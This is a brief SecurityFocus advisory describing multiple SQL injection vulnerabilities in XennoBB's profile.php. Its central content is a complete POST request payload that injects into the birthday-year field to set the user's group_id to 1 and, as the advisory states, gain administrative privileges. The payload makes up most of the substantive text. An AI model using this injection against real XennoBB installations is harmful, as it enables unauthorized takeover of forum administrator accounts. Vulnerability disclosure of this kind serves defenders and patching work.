XennoBB Profile.PHP Multiple SQL Injection Vulnerabilities

Attackers can exploit this issue via a web client.

Submitting the following as a POST request to profile.php is sufficient to exploit these issues and gain administrative privileges:

form_sent=1&form[sex]=a&bday_day=1&bday_month=2&bday_year=", group_id=1, birthday="


 

Privacy Statement
Copyright 2010, SecurityFocus